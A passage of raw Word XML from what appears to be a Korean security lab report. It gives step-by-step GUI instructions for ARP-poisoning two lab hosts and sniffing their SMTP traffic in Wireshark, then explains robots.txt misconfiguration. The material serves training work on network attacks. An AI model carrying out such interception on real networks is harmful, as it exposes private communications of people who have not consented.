          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>호스트 목록</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046F7719" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1276" w:firstLineChars="50" w:firstLine="190"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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D0DB1A" wp14:editId="1C72358F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>967139</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>620629</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2541270" cy="1549868"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="117" name="직사각형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15498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79CBC" id="직사각형 117" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:76.15pt;margin-top:48.85pt;width:200.1pt;height:122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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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647D82DE" wp14:editId="3E126946">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="margin">
                  <wp:posOffset>-165207</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6772275" cy="10250309"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="118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02503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00778" id="직사각형 118" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:-13pt;width:533.25pt;height:807.1pt;z-index:-251459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  <w:r w:rsidRPr="004D4939">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="635D681C" wp14:editId="6E1D3A5C">
            <wp:extent cx="5760000" cy="3400305"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1016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00305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338AFBB" w14:textId="689F8B04" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="666" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>⑤ 타겟 설정</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BA74DE" w14:textId="352C5F17" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Add to Target 1: </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">타겟 </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP (192.168.0.147)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2263FB" w14:textId="40BD71BC" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Add to Target 2: </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">타겟 </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP (192.168.0.146)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E626D6D" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="476" w:firstLineChars="500" w:firstLine="1000"/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F77CB77" wp14:editId="391B80A8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>935378</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2955053</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2040757" cy="331771"/>
                <wp:effectExtent l="19050" t="19050" r="17145" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="119" name="직사각형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757" cy="3317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017B4" id="직사각형 119" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:73.65pt;margin-top:232.7pt;width:160.7pt;height:26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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D4939">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08C437C6" wp14:editId="0D8CBF01">
            <wp:extent cx="5760000" cy="3400305"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1016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00305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10CAEE2" w14:textId="6F7A70CF" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>⑥</w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> [MITM] – [ARP poisoning …] –[ Sniff remote connection]-</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">k] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E0E76" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRPr="004D4939" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1276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0BF7686F" wp14:editId="56B46274">
            <wp:extent cx="5760000" cy="3168834"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1270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68834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7B7274" w14:textId="4A85132F" w:rsidR="00DD2FD4" w:rsidRDefault="00DD2FD4" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3DC2EB" w14:textId="1CEB71AD" w:rsidR="00DD2FD4" w:rsidRDefault="00DD2FD4" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">분석 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7387524E" w14:textId="6E61F63C" w:rsidR="00DD2FD4" w:rsidRDefault="00DD2FD4" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:left="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">실행  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299AA883" w14:textId="0A93ABCC" w:rsidR="00DD2FD4" w:rsidRDefault="00DD2FD4" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1200"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E325E97" wp14:editId="1CFB3E47">
            <wp:extent cx="5760000" cy="583395"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2667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83395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410B17" w14:textId="741D94BB" w:rsidR="003C14C9" w:rsidRDefault="00DD2FD4" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:left="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 타겟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>PC(192.168.0.147)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">에서 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">secret </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA1AAD" w14:textId="472D1612" w:rsidR="003C14C9" w:rsidRDefault="00DA2D7E" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="12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7B48908" wp14:editId="6C339569">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>2482553</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>609386</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="503638" cy="220233"/>
                <wp:effectExtent l="19050" t="19050" r="10795" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="135" name="직사각형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38" cy="2202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2D551" id="직사각형 135" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:195.5pt;margin-top:48pt;width:39.65pt;height:17.3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" filled="f" strokecolor="#c00000" strokeweight="2.25pt">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DD2FD4" w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15DB1DED" wp14:editId="5EDD977E">
            <wp:extent cx="5759450" cy="1365368"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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3599" cy="1368722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B48EFD" w14:textId="4724F28F" w:rsidR="003C14C9" w:rsidRDefault="00DD2FD4" w:rsidP="00EF1860">
      <w:pPr>
        <w:ind w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ilter: smtp </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CF84CB" w14:textId="2CC396CB" w:rsidR="003C14C9" w:rsidRDefault="00DA2D7E" w:rsidP="00DD2FD4">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="12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9B9D084" wp14:editId="7E5EED44">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>800100</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>825049</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5703324" cy="117475"/>
                <wp:effectExtent l="19050" t="19050" r="12065" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="145" name="직사각형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324" cy="117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784F" id="직사각형 145" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:63pt;margin-top:64.95pt;width:449.1pt;height:9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" filled="f" strokecolor="#c00000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80B49AB" wp14:editId="0B1E4758">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>805262</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>567178</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="500994" cy="140232"/>
                <wp:effectExtent l="19050" t="19050" r="13970" b="12700"/>
                <wp:wrapNone/>
                <wp:docPr id="136" name="직사각형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94" cy="1402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4AB6B" id="직사각형 136" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:63.4pt;margin-top:44.65pt;width:39.45pt;height:11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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DD2FD4" w:rsidRPr="00DD2FD4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AA14C91" wp14:editId="5F9AAE73">
            <wp:extent cx="5756514" cy="2083215"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="1270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2648" cy="2096292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DD2FD4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F62113" w14:textId="280B9B64" w:rsidR="002D35C4" w:rsidRDefault="00DD2FD4" w:rsidP="00DA2D7E">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="12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>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">와이어샤크로 패킷을 확인해보면 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 정보를 확인할 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t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7F222F" w14:paraId="42D60FAA" w14:textId="77777777" w:rsidTr="007F222F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left w:val="nil"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05590308" w14:textId="4E4F5E10" w:rsidR="007F222F" w:rsidRDefault="00F91FA0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lastRenderedPageBreak/>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="007F222F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. </w:t>
            </w:r>
            <w:r w:rsidR="00382A60">
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Robots File</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="5D24C624" w14:textId="77777777" w:rsidTr="007F222F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  <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2923CAB8" w14:textId="77777777" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F">
            <w:pPr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</w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="2887DFBE" w14:textId="77777777" w:rsidTr="007F222F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66D22FFD" w14:textId="0C693802" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="200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7F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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. </w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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ecurity Misconfiguration </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="1C498C82" w14:textId="77777777" w:rsidTr="007F222F">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DA3F027" w14:textId="77777777" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F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잘못된 보안 구성</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A259048" w14:textId="77777777" w:rsidR="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F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서버/</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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  <w:r w:rsidRPr="007F222F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시스템/</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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DB/</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>네트워크 장비/</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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  <w:r w:rsidRPr="007F222F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웹 설정 오류로 인하여 발생하는 취약점이다.</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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</w:p>
          <w:p w14:paraId="7F9F45E6" w14:textId="3B287537" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="76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</w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="3209B599" w14:textId="77777777" w:rsidTr="007F222F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4CA005C2" w14:textId="68EE967D" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:ind w:firstLineChars="100" w:firstLine="20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7F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>. ‘robots.tx</w:t>
            </w:r>
            <w:r w:rsidR="00740769">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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’ </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F222F" w14:paraId="465963BC" w14:textId="77777777" w:rsidTr="007F222F">
        <w:trPr>
          <w:trHeight w:val="424"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B9AFDB8" w14:textId="0BF3494A" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F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검색 엔지를 통해서 정보를 검색하는 것을 제어할 때 사용하는 파일이다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4F5761" w14:textId="76575AD3" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>만약,</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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  <w:r w:rsidRPr="007F222F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중요한 디렉토리,</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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  <w:r w:rsidRPr="007F222F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파일들이 검색이 된다면</w:t>
            </w:r>
            <w:r w:rsidR="00377BF4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 </w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>디렉토리 리스팅에 의해서 정보가 노출되는 문제가 발생한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE392B3" w14:textId="1AD83A45" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>또한,</w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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‘robots.txt’ </w:t>
            </w:r>
            <w:r w:rsidRPr="007F222F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파일은 웹-서버 홈 디렉터리에 생성하고 관리해야 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7440375D" w14:textId="376474CD" w:rsidR="007F222F" w:rsidRPr="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:ind w:leftChars="0" w:left="76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  <w:p w14:paraId="23E1A66E" w14:textId="757318D2" w:rsidR="007F222F" w:rsidRDefault="007F222F" w:rsidP="007F222F">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36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7F222F">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>명령어 형식은 다음과 같다</w:t>
            </w:r>
            <w:r w:rsidR="00A068FB">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B8C209B" w14:textId="77777777" w:rsidR="00A068FB" w:rsidRPr="00A068FB" w:rsidRDefault="00A068FB" w:rsidP="00A068FB">
            <w:pPr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  <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="a3"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblInd w:w="788" w:type="dxa"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="3149"/>
              <w:gridCol w:w="4819"/>
            </w:tblGrid>
